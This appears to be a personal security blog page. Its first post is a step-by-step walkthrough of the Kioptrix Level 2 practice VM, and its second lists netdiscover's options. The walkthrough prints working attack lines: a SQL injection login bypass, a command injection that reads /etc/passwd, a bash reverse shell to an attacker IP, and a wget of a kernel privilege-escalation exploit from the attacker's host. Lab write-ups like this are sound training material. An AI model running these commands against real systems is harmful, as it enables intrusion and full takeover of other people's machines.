Wednesday, February 20, 2019

Kioptrix_level2

netdiscover -f -r 192.168.0.0/24

nmap -sS -T4 -A 192.168.0.9

 nikto -host 192.168.0.9 -port 80 -output nikto.html

SQL injection

username admin and password 'OR'1'='1

ping 127.0.0.1;cat /etc/passwd

;uname -ar

on kali linux: run nc -nlvp 443

on kioptrix   ; bash -i >& /dev/tcp/172.16.209.129/443 0>&1

you will get shell access on kali

run whoami

It will show apache

Now go back to kali

cat /etc/*-release it will show OS 4.5
 
run searchsploit -w linux kernel CentOS 
9545.c this one is for privilege escalation

 python -m SimpleHTTPServer 80

 wget http://kalilinuxIP/9545.c

 after file getting downloaded

 gcc -o priv 9545.c

 chmod 755 priv

 ./priv

 whoami  u will see root

cat .bash_history
Posted by at No comments:

Netdiscover

netdiscover [-i device] [-r range | -p] [-s time] [-n node] [-c count] [-f] [-S]
-i device -- The network interface to sniff and inject packets. If no interface is specified, first available will be used.
-r range -- Scan a given range instead of auto scan. Valid range values area for example: 192.168.0.0/24, 192.168.0.0/16 or 192.168.0.0/8.
-p -- Enable passive mode. In passive mode, netdiscover does not send anything, but does only sniff.
-s time -- Sleep given time in milliseconds between each arp request injection. (default 1)
-c count -- Number of times to send each arp request. Useful for networks with packet loss, so it will scan given times for each host.
-n node -- Last ip octet of the source ip used for scanning. You can change it if the default host is already used. (allowed range: 2 to 253, default 66)
-S -- Enable sleep time suppression between each request. If set, netdiscover will sleep after having scanned 255 hosts instead of sleeping after each one.
This mode was used in netdiscover 0.3 beta4 and before. Avoid this option in networks with packet loss, or in wireless networks with low signal level. (also called hardcore mode)
-f -- Enable fast mode scan. This will only scan for .1, .100 and .254 on each network. This mode is usefull while searching for ranges being used. After you found such range you can make a specific range scan to find online boxes.
Posted by at No comments:
Subscribe to: Posts (Atom)